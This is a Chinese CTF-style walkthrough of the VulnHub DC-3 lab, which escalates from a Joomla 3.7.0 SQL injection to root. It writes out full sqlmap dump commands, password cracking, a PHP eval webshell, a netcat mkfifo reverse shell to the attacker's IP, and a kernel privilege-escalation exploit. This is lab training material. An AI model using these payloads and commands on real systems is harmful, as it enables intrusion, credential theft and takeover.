DC-3通关详解

DC-3是另一个专门建立的易受攻击的实验室,旨在获得渗透测试领域的经验。与之前的DC版本一样,这个版本是为初学者设计的,尽管这一次只有一个标志,一个入口点,根本没有线索。必须具备Linux技能并熟悉Linux命令行,还必须具有使用基本渗透测试工具的经验。

下载DC-3靶场

靶场下载地址:https://www.vulnhub.com/entry/dc-32,312/

KALI和DC-3都用NAT模式

更改完之后启动kali和DC-3靶机

信息收集:寻找真实ip

首先使用ip add确定自己kali和DC-3的网段,发先为186网段

寻找靶机真实ip

我们使用nmap -sP 192.168.186.0/24

最终可以确定

kali的ip为192.168.186.130

DC-3的ip为192.168.186.132

信息收集:探端口及服务

nmap -A -p- -v 192.168.186.132(这里ip为自己DC-3的ip)

-A 综合性扫描

-v 冗余模式

发现开放了80端口,存在web服务,Apache/2.4.18,CMS为Joomla

访问网站192.168.186.132(使用kali自带的火狐)

这里它告诉我们这次只有一个目标

这次只有一面旗帜、一个入口,没有任何线索。

要获得旗帜,您显然必须获得根特权。

你如何成为根取决于你--显然,也取决于系统。

祝你好运--我希望你能接受这个小挑战。

利用JoomScan进行扫描获取后台地址

由于我们前面采用nmap进行扫描时我们已经发现了中间件为joomla,我们可以采用joomscan进行扫描,如果我们不知道是joomla,我们可以采用目录扫描或者nikto等扫描工具进行扫描。发现更多的信息。

OWASPJoomla!漏洞扫描器(JoomScan)是一个开源项目,其主要目的是实现漏洞检测的自动化,以增强Joomla CMS开发的安全性。该工具基于Perl开发,能够轻松无缝地对各种Joomla项目进行漏洞扫描,其轻量化和模块化的架构能够保证扫描过程中不会留下过多的痕迹。它不仅能够检测已知漏洞,而且还能够检测到很多错误配置漏洞和管理权限漏洞等等。除此之外,OWASP JoomScan使用起来非常简单,不仅提供了非常友好的用户界面,而且还能够以HTML或文本格式导出扫描报告。

joomScan扫描

joomscan --url http://192.168.186.132  提示没有joomscan 选择y安装

输入 apt install joomscan安装

紧接着输入joomscan --url http://192.168.186.132扫描,结果如下图

知道了joomla 版本为3.7.0

得到了后台网址http://192.168.186.132/administrator/

利用nikto扫描获取后台地址

Nikto简介

    Nikto是一个开源的WEB扫描评估软件,可以对Web服务器进行多项安全测试,能在230多种服务器上扫描出 2600多种有潜在危险的文件、CGI及其他问题。Nikto可以扫描指定主机的WEB类型、主机名、指定目录、特定CGI漏洞、返回主机允许的 http模式等。

Nikto扫描

我们前面已经知道了CMS是joomla,并且知道了后台地址,针对于这一个靶场这一步没有任何意义,这里只是提供一个思路,目录扫描

nikto --url http://192.168.186.132/

------

查找漏洞发现存在SQL注入

    我们前面知道了CMS为joomla,版本为3.7.0

使用searchsploit检查到有对应的漏洞

searchsploit joomla 3.7.0

我们发现有一个SQL注入,还存在一个XSS

我们可以在这里查看一下漏洞提示信息

searchsploit -m 42033.txt

使用cat 42033.txt,提示信息如下

我们看到了POC,我们验证一下,把localhost修改为我们的靶机IP就ok

http://192.168.186.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27

看到提示,数据库语句错误,说明进行了拼接,存在SQL注入

sqlmap跑出数据

跑出所有数据库

sqlmap -u "http://192.168.186.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] --batch

扫描结果,成功把数据库跑出来了

获取当前数据库的名字joomladb

sqlmap -u "http://192.168.186.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] --current-db --batch

sqlmap -u "http://192.168.186.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 -p list[fullordering] -D "joomladb" --tables --batch

观察表名,很明显,我们会关注#__users这张表

获取joomladb的users表的字段名

sqlmap -u "http://192.168.186.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 -p list[fullordering] -D "joomladb" --tables -T "#__users" --columns

第一个选项,直接回车使用默认的“Y”

第二个选项,使用“y”,不要使用默认的,不然会出错

第三个1/2任选,这里我选择的是1

第四个选项使用10

最后跑出来6个字段

获取目标字段username和password

sqlmap -u "http://192.168.186.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 -p list[fullordering] -D "joomladb" --tables -T "#__users" --columns -C "username,password" --dump --batch

获得结果如下
拿到一个用户名和加密的密码

利用john爆破密码snoopy

    使用john破解出admin密码,john the ripper是一款本地密码破解工具,可以从我们上面生成的shadow文件(密码散列)中破解出密码。破解时间取决于密码的复杂程度以及破解模式。

创建一个1.txt,把加密的密码字段写入

使用john破解出admin密码是snoopy

利用获取到的账号密码进行登录

http://192.168.186.132/administrator/

admin/snoopy

登陆成功

上传webshell

发现一个上传点

点击Beez3 Details and Files进入

点击New Files

这里我们发现可以上传文件,考虑上传木马,也可以创建文件进行编辑

上传木马,我们先要找到当前文件所在的目录:

http://192.168.186.132/templates/beez3/html/

回到刚才的页面点击new file
在html下创建一个php文件,名字叫做shell

创建成功之后,会跳转到编辑页面,然后我们输入php一句话,点击左上角绿色的save进行保存

<?php

echo ("密码是a");

@eval($_REQUEST [a]);

?>

再次访问http://192.168.186.132/templates/beez3/html/

发现多了一个shell.php文件,我们访问一下

访问webshell,得到我们设置的会先内容,文件上传成功

http://192.168.186.132/templates/beez3/html/shell.php

打开蚁剑管理webshell右键添加数据

右键进入虚拟终端执行whoami查询我权限,是www-data权限

kali监听

nc -lvvp 1234

靶机连接

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.186.130 1234 >/tmp/f(这里的ip为虚拟机ip)

创建交互式shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

使用辅助脚本发现提权漏洞

下载辅助脚本Linux-Exploit-Suggester.sh

下载地址:

https://github.com/mzet-/linux-exploit-suggester

上传辅助脚本

我们直接在蚁剑中上传

上传成功(把下载好的zip文件解压好上传,和下方标注相同)

发现漏洞

ls -l linux-exploit-suggester.sh

发现没有执行权限给它加个执行文件

chmod +x linux-exploit-suggester.sh

执行脚本

./linux-exploit-suggester.sh

发现很多可利用漏洞

使用辅助脚本提权

获取提权脚本

    上面发现了很多漏洞,这里我们挑一个进行提权

挑选CVE-2016-4557

在图片里可以看到是一个39772的文件,由于给出的那个URL无法下载

也可以去searchsploit里面去看看

地址和上面一样也不能使用

可以使用下面地址直接下载

bin-sploits/39772.zip · main · Exploit-DB / Binary Exploits · GitLab

提权

    解压文件

unzip 39772.zip

cd 39772

Ls

tar -xvf exploit.tar

cd ebpf_mapfd_doubleput_exploit

./compile.sh

./doubleput

执行完之后,提权成功

获得root权限

发现the-flag.txt

cd /root

ls

cat the-flag.txt

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值